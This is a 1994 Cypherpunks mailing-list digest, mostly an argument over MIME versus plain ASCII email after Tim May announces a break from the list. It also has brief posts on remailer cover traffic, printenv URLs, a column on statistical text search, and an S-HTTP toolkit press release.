>bleeding edge of technology. Depressing.

Nobody is posturing or bragging. Perhaps I should have learned more programming, to help advance the cause, but everybody has their talent and programming isn't mine. Nonetheless, even if you don't like the messengers, listen to the message with an open mind. This is not a flame war. No insults. No criticism of a person.

>The consensus of the active posters in this latest thread (Perry,
>Amanda, Lucky, Jim, others) is that I am a hopeless fuddy-duddy,
>unwilling to begin posting in the latest modality.
>
>(Funny, Netnews is still 99.999983% plain ASCII, by message count, and
>nobody advocating a more advanced scheme is actually _using_ such ne
>plus ultra formats here on this list. If it's so easy, and so 'punkly
>correct, why not?)

If I thought that you were a hopeless case and beyond learning, I wouldn't spend so much time posting on this topic. It would be uncalled for to post messages here in MIME. This list is about thought exchange and the type of thought exchange that we do here can be done just fine in ASCII. The same is true for most of netnews. That doesn't mean that a different newsreader wouldn't make it easier on you. Have you ever tried Newswatcher? Have you noticed that the latest software updates posted to USENET are just a mouse click away? Can you honestly say that you don't like Newswatcher better than tin?

>Jim McCoy wrote:
>
>> If you are truly interested in making strong encryption easy and
>> transparent to the vast majority of the users of future communications
>> systems you should be leading the MIME charge, not holding everyone back...
>
>I don't care for this imputation that my views on communicating with
>the list are somehow holding others back. Or that discussing these
>issues is inconsistent with being "truly interested in making strong
>encryption easy and transparent."

Just different ways of trying to make you see the light.

>Bluntly, I'm fucking sick and tired of these cheap shots and personal
>innuendos. Maybe it's the "young guns" syndrome, with a codger like me
>whose first Net account was in 1972 being a ripe target for the newest
>pistoleros with their .486-caliber Linux boxes in their holsters.
>
>Whatever, I'm fed up.

I don't see any cheap shots or personal innuendos.
All I see are a lot of folks who like you and wish to help you as you helped them. You have said that you don't want any help. That is your right, but understand that unless you adopt some of the new tools the world will leave you behind. We all have learned a lot from you (at least I have) and we know that the sooner you start seriously using the new stuff the sooner you will help improve it by your _constructive_ criticism.

Enjoy your vacation.

-- Lucky Green
   PGP encrypted mail preferred.

From bdolan at use.usit.net Fri Dec 16 00:17:03 1994
From: bdolan at use.usit.net (Brad Dolan)
Date: Fri, 16 Dec 94 00:17:03 PST
Subject: Tim May the Luddite--His Last Message for A While
In-Reply-To: <199412160654.WAA02983@netcom15.netcom.com>
Message-ID:

FWIW, here's to you, Tim, from another Luddite:

I learn and use new tools to the extent I think they make my life better. ASCII still looks good to me.

Signal-to-noise ratio on this list has fallen to zero. Arrogance-to-signal ratio is near infinite.

Brad

On Thu, 15 Dec 1994, Timothy C. May wrote:

>
> It may be time for me to move on. More than 2 years on this list,
> since the B.C. period, may be too long.
>
> I'm fed up with fighting these battles, and no doubt many of you are
> fed up with seeing contentious pitched battles. Cypherpunks is
> increasingly a forum of strutting and posturing about who has the most
> powerful tools, who is spending more of their lives staying at the
> bleeding edge of technology. Depressing.
>
> The consensus of the active posters in this latest thread (Perry,
> Amanda, Lucky, Jim, others) is that I am a hopeless fuddy-duddy,
> unwilling to begin posting in the latest modality.
>
> (Funny, Netnews is still 99.999983% plain ASCII, by message count, and
> nobody advocating a more advanced scheme is actually _using_ such ne
> plus ultra formats here on this list. If it's so easy, and so 'punkly
> correct, why not?)
>
> Jim McCoy wrote:
>
> > If you are truly interested in making strong encryption easy and
> > transparent to the vast majority of the users of future communications
> > systems you should be leading the MIME charge, not holding everyone back...
>
> I don't care for this imputation that my views on communicating with
> the list are somehow holding others back. Or that discussing these
> issues is inconsistent with being "truly interested in making strong
> encryption easy and transparent."
>
> Bluntly, I'm fucking sick and tired of these cheap shots and personal
> innuendos. Maybe it's the "young guns" syndrome, with a codger like me
> whose first Net account was in 1972 being a ripe target for the newest
> pistoleros with their .486-caliber Linux boxes in their holsters.
>
> Whatever, I'm fed up.
>
> I'm taking a break and unsubbing for a while. If I'm back in time for
> the January meeting, we'll have the "Demo Day" as planned. If not,
> you'll have to play it by ear.
>
> As they say, you know what a Cypherpunks firing squad is?
>
> A circle.
>
>
> --Tim May
>
>
> --
> ..........................................................................
> Timothy C. May | Crypto Anarchy: encryption, digital money,
> tcmay at netcom.com | anonymous networks, digital pseudonyms, zero
> 408-688-5409 | knowledge, reputations, information markets,
> W.A.S.T.E.: Aptos, CA | black markets, collapse of governments.
> Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
> Cypherpunks list: majordomo at toad.com with body message of only:
> subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay
>
>
>

From lcottrell at popmail.ucsd.edu Fri Dec 16 00:24:06 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 16 Dec 94 00:24:06 PST
Subject: Question for remailer operators
Message-ID:

>I see about 200 messages a day through my remailer, sizes averaging a
>couple of K.
>I had the impression at one point that the VAST majority of
>this was "cover" traffic that someone is generating just to keep the
>network busy. I don't know if this is still the case. It might be
>possible to opt out of the cover traffic generator to reduce your load
>to a politically manageable level. Maybe people generating cover traffic
>could estimate how many messages they are generating.
>
>
>Hal

I have a script generating covering traffic. It creates a message at random intervals between 1 and 20 min. The messages are encrypted, and padded with cutmarks for all remailers which support that. The messages are sent through six hops. The remailers are chosen from all reasonably reliable remailers on Raph Levine's list (except for those which have asked to be excluded).

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come."
--Nietzsche

From lcottrell at popmail.ucsd.edu Fri Dec 16 00:24:14 1994
From: lcottrell at popmail.ucsd.edu (Lance Cottrell)
Date: Fri, 16 Dec 94 00:24:14 PST
Subject: Remailers and Keyservers, active ones?
Message-ID:

>Is there a list of the currently active remailers and key servers?
>
>
>-uni- (Dark)
>

While I do not remember the URL of the remailer list, it is on my home page.

--------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come."
--Nietzsche

From jamesd at netcom.com Fri Dec 16 00:26:18 1994
From: jamesd at netcom.com (James A. Donald)
Date: Fri, 16 Dec 94 00:26:18 PST
Subject: MIME is not standardB
In-Reply-To: <199412160753.XAA02891@deepthought.pylon.com>
Message-ID:

Check the alt.binaries groups for MIME compliant binaries.

I was not able to find one.

In addition, my MIME compliant newsreader was not able to interpret the message formats it did encounter.

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.

James A. Donald
jamesd at netcom.com

From cactus at seabsd.hks.net Fri Dec 16 00:59:32 1994
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Fri, 16 Dec 94 00:59:32 PST
Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!)
Message-ID: <199412160904.EAA13405@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article <199412160709.BAA20011 at pentagon.io.com>, Jim McCoy wrote:
>A position to which I still agree on this particular issue. Perhaps not
>stated as diplomatically as Perry did, but so be it...

No slam on Perry intended (really), but when Perry starts looking diplomatic to you it's time to reassess your communication skills.

- --
Todd Masco | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com | neither more nor less.'" - Lewis Carroll
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

-----END PGP SIGNATURE-----

From iijon at iiit.swan.ac.uk Fri Dec 16 01:19:02 1994
From: iijon at iiit.swan.ac.uk (Jon Care)
Date: Fri, 16 Dec 94 01:19:02 PST
Subject: HTML "printenv"
Message-ID:

Hi all,

A while back, there was mention of a WWW URL that gave back all the details passed between one's client and a server.

Can anyone remember the URL? I remember it ended in "printenv"

Thanks for the help.

--
Jonathan H. Care, i^2it Ltd. -o- PGP public key available.
Email: iijon at iiit.swan.ac.uk -o- Tel: +44 1792 295213 Fax:+44 1792 295811
http://www.linux.org.uk/Jon.html -o- My opinions are solely my own.
VMS - OS software for the 70's.

From mccoy at io.com Fri Dec 16 01:59:21 1994
From: mccoy at io.com (Jim McCoy)
Date: Fri, 16 Dec 94 01:59:21 PST
Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!)
In-Reply-To: <199412160742.CAA12589@bb.hks.net>
Message-ID: <199412160959.DAA08158@pentagon.io.com>

L. McCarthy writes:
> Jim McCoy writes:
> > Actually this "dumb flamewar" has produced some good discussion regarding
> > actual implementation issues.
>
> I beg to differ. If you think that was a good discussion, I'd hate to see
> what you'd classify as a bad discussion. Crypto relevance was minimal, too.

A bad discussion contains very little signal. The crypto relevance to the MIME discussion was quite apparent to me, it is a shame you missed it. For starters the difficulty of advancing technology conducive to CP goals when it runs counter to the inertia of "what I have now works for what I want to do today, so why bother doing something that might just be better in the long run..." Every argument that was used against MIME will one day be used to discourage the widespread use of cryptography.
Additionally, MIME is a necessary standard for encapsulating cryptographic messages in a package that can get through some of the stranger transport mechanisms used on the net, it doesn't make much sense to argue over what color to paint the Ferrari when all you have is dirt roads to drive it on...

> > Everything that has happened with MIME will happen again when people
> > try to add cryptography to the structure of the net.
>
> It seems to me that people are *already* trying to add cryptography to the
> structure of the net, and that would actually be worth discussing.

Yeah, like the PGP-MIME draft, which will open up the ability to effectively use PGP to more people than anything the cypherpunks have ever done :) Standards are important and instead of trying to tilt at windmills to no purpose perhaps it is worthwhile to examine how existing standards can be effectively marshaled towards cypherpunk goals.

jim

From lmccarth at ducie.cs.umass.edu Fri Dec 16 03:23:17 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Fri, 16 Dec 94 03:23:17 PST
Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!)
Message-ID: <199412161128.GAA14473@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Jim McCoy writes:
> L. McCarthy writes:
> > Jim McCoy writes:
> > > Actually this "dumb flamewar" has produced some good discussion regarding
> > > actual implementation issues.
> > I beg to differ. If you think that was a good discussion, I'd hate to see
> > what you'd classify as a bad discussion. Crypto relevance was minimal, too.
> A bad discussion contains very little signal.

Right. We went through dozens of messages to establish that some people like MIME and others don't, just as we did several weeks ago. What a surprise that not much has changed since then. Bleeding wonderful.

> The crypto relevance to the MIME discussion was quite apparent to me,
> it is a shame you missed it.
If it was "quite apparent", it's a shame you didn't make that clearer at the time, rather than claiming it now. I saw plenty of flaming about various people's mailers and net connections. If someone was making points about crypto there, they were doing a damn fine job of hiding it.

> Every argument that was used against MIME will one day be
> used to discourage the widespread use of cryptography.

By this reasoning we should resurrect all the old firestorms about gun control and child pornography. Analogies can be drawn, perhaps, but I don't feel those discussions are appropriate here.

> Additionally, MIME
> is a necessary standard for encapsulating cryptographic messages in a
> package that can get through some of the stranger transport mechanisms used
> on the net,

Good standards are good. There's a revelation. Yep, we sure needed dozens of messages to rehash that. Right.

> > > Everything that has happened with MIME will happen again when people
> > > try to add cryptography to the structure of the net.
> > It seems to me that people are *already* trying to add cryptography to the
> > structure of the net, and that would actually be worth discussing.
> Yeah, like the PGP-MIME draft, which will open up the ability to
> effectively use PGP to more people than anything the cypherpunks have ever
> done :)

So why not talk about that instead ?

> Standards are important and instead of trying to tilt at
> windmills to no purpose perhaps it is worthwhile to examine how existing
> standards can be effectively marshaled towards cypherpunk goals.

Exactly.

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.
A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

-----END PGP SIGNATURE-----

From danisch at ira.uka.de Fri Dec 16 05:11:15 1994
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Fri, 16 Dec 94 05:11:15 PST
Subject: HTML "printenv"
Message-ID: <9412161310.AA06727@elysion.iaks.ira.uka.de>

> A while back, there was mention of a WWW URL that gave back all the
> details passed between one's client and a server.
> Can anyone remember the URL? I remember it ended in "printenv"

Try these:

http://www.mit.edu:8001/machine
http://www.uiuc.edu/cgi-bin/printenv

Hadmut

From rishab at dxm.ernet.in Fri Dec 16 05:37:40 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Fri, 16 Dec 94 05:37:40 PST
Subject: Processing data, information and knowledge
Message-ID:

Here's an episode from my column that mentions Architext and NSA's statistical text searching techniques. Try the 'concept search' at hotwired (www.wired.com) or Time Inc's Pathfinder (www.timeinc.com), or look at the demo at Architext - www.atext.com.

Rishab

---

Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#40, 12/December/1994: Processing data, information and knowledge

Computers are good at processing data. Juggling numbers, indexing names and addresses, these are the rudimentary tasks upon which much of the world's infrastructure depends. Computers are mediocre at processing information, the layering of data with complex inter-relationships. But they are simply pathetic at handling knowledge, the models based on piles of information used to understand and predict an aspect of the world around us, expressed by humans not in tables and charts, but in articles and books.

Computers are organized.
They can understand streams of homogeneous inputs, they can follow links between data that are made clear and detailed. This preference for structure makes it somewhat difficult to get computers to process more naturally expressed concepts and knowledge embodied in human-language text.

Passing over the entirely academic debate about the ability or otherwise of machines to ever understand human ideas, the fact is that most attempts at getting computers to process or aid in processing such ideas have concentrated on making computers 'artificially intelligent' - making them form their own structured model of relatively unstructured text.

Computer systems for natural language processing try to find meaning in a text by translating it into some internal representation, with the aid of a detailed grammar-book far more explicit than most humans could bear. Most natural language processing is either too slow, too inaccurate, or too limited to a particular human language or set of concepts to be practically useful on a large scale. While it may be pretty good for simple voice-based interfaces, NLP is unlikely in the near future to be able to, for instance, quickly go through 2 years of Time magazine and identify the US government's changing policy on the war in Bosnia.

While NLP begins with the assumption that machines need some sort of understanding to process text, other methods concentrate more on practical applications. These usually abandon any attempt to search for a structure in textual inputs, and rely instead on identifying a vague pattern.

Neural networks, which try to simulate the working of the brain, are frequently used to identify patterns in images, sounds and financial data. Though they are often quite successful at their limited tasks, they are not normally used to process text.
One reason for this is perhaps that text either needs to be interpreted in the small chunks of conversation, which requires a knowledge of grammar that conventional NLP provides; the other use for text processing is in organizing huge volumes of it, for which neural networks are too slow.

The alternative comes strangely enough from the US National Security Agency. It has always been suspected that the NSA searches through e-mail traffic for 'sensitive' material, which for the large volumes involved would require considerable help from computers. Earlier this year, the agency began soliciting collaborations from business to develop commercial applications of their technique. It claimed to be able to quickly search through large quantities of text, in any language, for similarities to sample documents, and even automatically sort documents according to topics that it identifies. A similar though independently developed system is available from California-based Architext.

Though statistical techniques for text processing are not entirely new, the continuing development in the area is a sign of the growing use of computers as knowledge-processing aids. By identifying patterns more-or-less blindly, without any attempt at understanding the concepts they represent, they can help us make some sense of the ocean of information that otherwise threatens to swamp us.

Rishab Aiyer Ghosh is a freelance technology consultant and writer. You can reach him through voice mail (+91 11 3760335) or e-mail (rishab at dxm.ernet.in).

--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
This article may be redistributed in electronic form only, PROVIDED THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT.
This article MAY NOT UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form, or redistributed in any form for compensation of any kind, WITHOUT PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab at dxm.ernet.in)
--==================================================================--

From perry at imsi.com Fri Dec 16 06:25:43 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Fri, 16 Dec 94 06:25:43 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412160338.TAA26446@netcom10.netcom.com>
Message-ID: <9412161424.AA02172@snark.imsi.com>

Timothy C. May says:
> My issue has not been with MIME as a transport mechanism, but
> non-ASCII content, which clearly most folks can't read.

Far from clear, Tim. Last time I checked, almost no one I communicated with regularly was using a machine without a pixmapped display. That means that all standing in the way of them being able to read non-ascii is the right font sitting on disk, and a program that groks it.

Perry

From rishab at dxm.ernet.in Fri Dec 16 06:50:21 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Fri, 16 Dec 94 06:50:21 PST
Subject: Mr Anonymous' ignorance and 10 threads
Message-ID:

Mr. Anonymous the Anti-Mime should be very embarrassed indeed:

> I think the point Tim is making is that at the current time, our lives
> are not made easier or enriched by "MIME". If I want point and click
> spreadsheet opening, I can use other systems that have worked for 5
> years or more, with apps that are already configured and easier to use.

Mr. Anonymous seems to believe that MIME is a way to associate documents with apps so that they start up on double-click! :-D

I don't really understand the need for such a huge 10% thread (SNR 1:10) on MIME of all things (with most of it concentrating on transmitting pictures and using dumb terminals).
I have my own domain name and access the Net at 24+ kbps from multiple platforms all capable of running MIME, but I don't post in MIME. I agree with Tim that it's only rarely that MIME could add value to posts on this list. When MIME readers do PGP nicely, then it would be something for Cypherpunks to scream about.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh              "In between the breaths is
rishab at dxm.ernet.in           the space where we live"
rishab at arbornet.org           - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA

From perry at imsi.com Fri Dec 16 07:00:18 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Fri, 16 Dec 94 07:00:18 PST
Subject: Amanda and MIME
In-Reply-To: <199412160714.XAA12540@jobe.shell.portal.com>
Message-ID: <9412161500.AA02233@snark.imsi.com>

anonymous-remailer at shell.portal.com says:
> I think if we only use MIME, the quality of discussion on the list
> would skyrocket. Eric, you should block all non-MIME posts to the
> list. How could we have been so blind?

The anonymous poster should feel happy he's anonymous, as his posting is embarrassingly stupid. Perhaps he'd like to make fun of ASCII next by posting his next message as sequences of octal digits.

Perry

From JLICQUIA at mhc.uiuc.edu Fri Dec 16 07:54:33 1994
From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI))
Date: Fri, 16 Dec 94 07:54:33 PST
Subject: MIME, VT100, SLIP, TIA, And All That
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Allow me to inject a "phenomenology of access" to the raging blaze...

I am sitting, at the moment, at a 486DX2/66 running Win 3.1 and PC/TCP. The Ethernet on this thing is connected (somewhere) to a fiber link which is itself connected to some serious bandwidth (I believe multiple T3s are involved).

This is an on-site job I'm doing for my company which is in the process of wrapping up, so soon I'll be returning to my regular workplace.
It's running a small net, with a Linux box routing mail via UUCP and SLIP (depending if someone's decided to pull SLIP up). We have to use net tools directly on the Linux box; our other computers (various types and operating systems, all high-powered) have no ability to access the world except through mail and the limited feed we can afford. Finally, as this list is high-bandwidth, my boss has told me to use a different account for 'punks. That is a local freenet account, no shell access, no TIA. (And before you ask: I do volunteer work for the freenet, and I know that there are *legal*, not technical, reasons why things like TIA will never be allowed.) I must use this through dialup; I have pine (no elm, no mailx, no mh, no X tools, etc.). With SLIP, I can POP my mail somewhere else; I'm getting ready to set up so I can do this from work, but it's running into bandwidth problems. There is no local SLIP provider that provides to home users. Thus, I am trapped in a VT100 environment, where a shell would be a great luxury. If and when I get SLIP, I'll have to do it on a 386SX/20 with 4M of RAM, not exactly your speed demon kind of machine. Many of the people I've talked to, and have convinced that crypto is a Good Thing(tm), are complete newbies. They might have a Prairienet account, they might not. Most of them are a bit intimidated by PGP, especially when I start talking to them about the hassles necessary to get PGP to work with dialup mail. And I can't blame them; I've yet to get a good setup running which will allow me to PGP-ize at home through my dialup, even with Linux running on my poor beast of burden. My point? Actually, I've got a few: 1. While I, too, have experienced the head rush that comes with fully graphical interfaces to high-bandwidth Net, I am also painfully aware of the reality that too many people are stuck with less. 
Given a few weeks, I may be one of them, and the prospects of this may be enough to cause me to, regretfully, follow Tim in his exodus from the list. (Forget the problem of signing!) 2. MIME (the standard) causes my heart to flutter. It is a wonderful standard. The implications are simply staggering, and for more than just crypto. I yearn for the day when Joe Average User can experience Amanda's MIME utopia in the comforts of his/her own home. It will, however, be a while before this can become a reality. Perhaps in California, where there are POPs every few blocks, it seems silly to suggest that we limit ourselves to the failings of the VT100; out here in central Illinois, however, where just establishing a single POP is an exercise in frustration (you don't want to know how I know this), the VT100 is here to stay for a long time. 3. I note with sadness the loss of one of our top propagandists ;-) over this issue. I respected his ability to see beyond the glitter of the possible into the cold darkness of the available, especially considering his comparative riches access- and hardware-wise. The issues he raised about MIME, he did from a personal standpoint, but he also was able to speak for many who don't have such great access. Noting the treatment he was given ("you don't fuckin' know what you're talking about"), I also wonder about my own fate when I am deprived of my own connectivity riches; considering that technical reasons alone just might necessitate my exit from the list, my resolve to stay might be undermined by the prospect of a list devoted to a technological elitism rather than a practical and grassroots effort to promote cryptography on all fronts, whether "technologically challenged" or not. Tim, I've CCed this to you, frankly, in the hopes that you'll come back soon. Not all of us think your middle name is Ludd. Happy vacation! 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvG3XTER5KvPRd0NAQEUDAP8D0e78hsqgHT8HPWZZTH3HJ6t80muA+cQ lRcL1hVVlPGLBrQWiuwlVTf5qCbL+oRKXSK5njce5hcLEayzgFfFXW4NpmS28qHq 1NBcdfSB8YfNmMUWSw2g78hDkZqAKuS2PUFr8x6L/BfbJYrLVvtHXEjWsb28cF3j zGCaDSDZ0ac= =4q7K -----END PGP SIGNATURE----- From jeff at firefly.prairienet.org Fri Dec 16 08:06:20 1994 From: jeff at firefly.prairienet.org (Jeff Young) Date: Fri, 16 Dec 94 08:06:20 PST Subject: the whole list Message-ID: I would like to be added to the list From nobody at myriad.pc.cc.cmu.edu Fri Dec 16 08:12:45 1994 From: nobody at myriad.pc.cc.cmu.edu (Anonymous) Date: Fri, 16 Dec 94 08:12:45 PST Subject: SecureWeb Message-ID: We'll just see.... =========Begin forwarded message========= >Date: Fri, 16 Dec 94 07:51:27 -0800 >From: more at newsmaster.tgc.com >To: SQUEAL at eek.eek.com >Subject: 4989 Web Security Toolkits Available Late December from Terisa >Systems Dec. 16 > >Web Security Toolkits Available Late December from Terisa Systems Dec. 16 >SUPERHIGHWAY REPORT HPCwire >============================================================================= > >A news release from Terisa Systems and SPRY -- > > Washington, D.C. -- Terisa Systems has announced that its SecureWeb >Toolkits for World Wide Web transaction security will be available later >this month. > > The company also said that CyberCash Inc., Open Market Inc., O'Reilly & >Associates, SPRY Inc., Spyglass Inc. and Verity Inc. will be the first >companies to use the toolkits to build Web servers or clients with security >features. > > Terisa Systems was launched earlier this year by RSA Data Security Inc. >(RSA) and Enterprise Integration Technologies Corp. (EIT). The company's >toolkits provide an implementation of Secure HTTP (HyperText Transfer >Protocol) for commercial products. Secure HTTP (S-HTTP), which was developed >by EIT, is a security-enhanced version of the World Wide Web's internal >communications language. 
> > David Pool, president of SPRY, said S-HTTP will be incorporated into the >company's Internet software -- Internet In A Box, the AIR Series and AIR >Mosaic Express -- in the first quarter of 1995. Consumers using Internet In >A Box will be able to purchase products safely over the Internet with a >credit card. In addition, companies or publishers using the AIR Series and >AIR Mosaic Express can market, sell and support their products. Pool said, >"Currently, the Internet is a vast, untapped marketplace still lacking >security and payment services. However, the S-HTTP protocol addresses both >encryption and authentication making electronic commerce a reality for our >customers." > > According to Douglas Colbeth, president of Spyglass, his company will offer >S-HTTP as a module in its Enhanced Mosaic Security Framework, making Mosaic >suitable for applications requiring confidentiality and authentication. >Enhanced Mosaic is the commercial version of NCSA Mosaic, the popular World >Wide Web browser from the National Center for Supercomputing Applications at >the University of Illinois. Colbeth said, "Our customers see the huge >potential in commerce on the Internet, but are very concerned about security. >An industrial strength solution such as Secure HTTP will let Mosaic handle >a wide range of applications requiring uncompromising security." > > At O'Reilly, Dale Dougherty, publisher for the Digital Media Group, said >S-HTTP will be used for a secure version of the GNN Direct service, that >allows subscribers to order from publishers or advertisers who market and >sell products over GNN Direct. He said, "We've been looking for a security >solution that will allow our subscribers to order safely online. Secure HTTP >provides the capabilities needed for our GNN service." 
> > Concerning plans of other licensees, CyberCash will use the technology to >provide a system for safe electronic payments over the Internet and Open >Market, a developer of electronic commerce solutions, plans to sell a Web >server that incorporates S-HTTP. Verity is introducing Verity Mosaic, a >Mosaic client offering user authentication and secure communications for use >with Verity's Topic Information Server for the World Wide Web, also announced >today. > > SecureWeb Toolkits include an implementation of EIT's Secure HTTP, which >ensures the authenticity of transactions and the confidentiality of >information exchanged via the World Wide Web. With a secure HTTP-enabled >application, users and information providers can encrypt and sign messages >and other material digitally. Binding agreements are possible because >communications are secret and tamper-proof and cannot be repudiated. > > SecureWeb kits incorporate RSA public key cryptography technology to permit >spontaneous, secure communications between unfamiliar correspondents. >SecureWeb also supports other cryptography systems such as traditional shared >password and Kerberos. A SecureWeb run-time license is required; run-time >license pricing is volume-based. Toolkits will be available on a limited >basis in December 1994. > > Additional information on Terisa Systems is available at URL >http://www.terisa.com. Those interested can also send e-mail to >infoterisa.com or telephone 415/617-1836. Additional information on Secure >HTTP is available by sending email to . > > For more information, contact Deanna Leung of SPRY, Inc. at 206/442-8231 >or email her at: , or contact Nancy Teater of Terisa Systems >at 415/321-0252, or email her at: . > >***************************************************************************** > H P C w i r e S P O N S O R S > Product specifications and company information in this section are > available to both subscribers and non-subscribers. 
> > 900) Ampex 915) Genias Software 905) Maximum Strategy > 912) Avalon Computer 930) HNSX Supercomputers 906) nCUBE > 921) Cray Research Inc. 902) IBM Corp. 932) Portland Group > 907) Digital Equipment 904) Intel SSD 935) Silicon Graphics > 909) Fujitsu America 916) MasPar Computer *931) Sony Corporation > > *Updated information within last 30 days >***************************************************************************** >Copyright 1994 HPCwire. >To receive the weekly HPCwire at no charge, send e-mail without text to >"trial at hpcwire.tgc.com". ==========end forwarded message========== ==================Thomas Jefferson================== The strongest reason for the people to retain their right to keep and bear arms is, as a last resort, to protect themselves against tyranny in government. ==================================================== From rsalz at osf.org Fri Dec 16 08:12:51 1994 From: rsalz at osf.org (Rich Salz) Date: Fri, 16 Dec 94 08:12:51 PST Subject: Kaufman/Eastlake DNS changes Message-ID: <9412161608.AA03398@sulphur.osf.org> You should probably drop a line to Paul Vixie, vixie at vix.com, the current maintainer of BIND. Tell him I sent you... As a side note, it's too bad that Digital seems to have lost all of their crypto-folks. The only one left is John Wray; at least he's good. /r$ From nsyfrig at wppost.depaul.edu Fri Dec 16 08:38:29 1994 From: nsyfrig at wppost.depaul.edu (nsyfrig at wppost.depaul.edu) Date: Fri, 16 Dec 94 08:38:29 PST Subject: Hey Martha! It's "The Invasion from Outer First Virtual" -rated Y (for Y-not) Message-ID: eric at remailer.net (Eric Hughes) wrote (among other things): Regardless of the security, users need to understand what it gives them. This is orthogonal to the choice of security, as well as to the persistence of thick-headedness in society. 
_________________(non-automatic divider line)___________________ I believe this is definitely a proverbial nail, and it has just been hit where it counts! Some evangelizing, education, and teamwork is definitely in order here. As implied, it doesn't just apply to the virtual world, but the real one as well. From xpat at vm1.spcs.umn.edu Fri Dec 16 08:50:59 1994 From: xpat at vm1.spcs.umn.edu (xpat at vm1.spcs.umn.edu) Date: Fri, 16 Dec 94 08:50:59 PST Subject: Low power/bandwidth machines Message-ID: <9412161650.AA08136@toad.com> "JEFF LICQUIA (CEI)" writes: >this from work, but it's running into bandwidth problems. There is no >local SLIP provider that provides to home users. Thus, I am trapped in >a VT100 environment, where a shell would be a great luxury. If and whe >I get SLIP, I'll have to do it on a 386SX/20 with 4M of RAM, not exactl >your speed demon kind of machine. >1. While I, too, have experienced the head rush that comes with fully >graphical interfaces to high-bandwidth Net, I am also painfully aware o >the reality that too many people are stuck with less. Given a few week, If you have access to a SLIP line, but frustrated with perhaps less of a machine than you would like, give MINUET a try. It is a DOS based tool designed for students with cheap/old computers so they can access the Internet. It includes embedded POPmail, news, ftp, telnet, ping etc. It is available anonymous FTP from boombox.micro.umn.edu /pub/pc/minuet/beta16/minuarc.exe or /pub/pc/minuet/shaky/minuarc.exe <--beta17 SLIP software that goes with it is at /pub/pc/slip/latest/sliparc.exe The beta17 has caused no problems for me yet. Beta17 has some performance advantages. A 386 should be no problem at all. 
--------------------------------------------------------------- P M Dierking xpat at vm1.spcs.umn.edu From amanda at intercon.com Fri Dec 16 08:55:02 1994 From: amanda at intercon.com (Amanda Walker) Date: Fri, 16 Dec 94 08:55:02 PST Subject: Tim May the Luddite--His Last Message for A While Message-ID: <9412161155.AA56102@chaos.intercon.com> > The consensus of the active posters in this latest thread (Perry, > Amanda, Lucky, Jim, others) is that I am a hopeless fuddy-duddy, > unwilling to begin posting in the latest modality. Actually, that's not my feeling at all. I haven't (at least intentionally) been making or intending to make the kinds of "get with the program" remarks that Lucky, Perry, and some others have been. I've just been trying to explain why I think that MIME isn't necessarily bunk. There is a middle ground between "the one true way" and "utter crap," after all, and I found your assertions that MIME was useless to be just as annoying as assertions that it's a panacea. I'm not telling you (or anyone else) to use MIME. Even I don't use the fancy features of MIME for most of my off-site email, especially mailing lists, for exactly the reasons you describe. I'm just tired of people deciding that because they're not able to take advantage of something, that it is therefore useless. That's all I've been intending to complain about, and I'm sorry if I've come across more strongly. I certainly don't want to chase you off the list. You're one of the people I take pains to read, even on high-volume email days... > Bluntly, I'm fucking sick and tired of these cheap shots and > personal innuendos. Maybe it's the "young guns" syndrome, with a > codger like me whose first Net account was in 1972 being a ripe target > for the newest pistoleros with their .486-caliber Linux boxes in > their holsters. Well, I came onto the net after the NCP/TCP flag day, so you've got some seniority on me, but I'm hardly a young gun, and I hate Intel processors and UNIX :). 
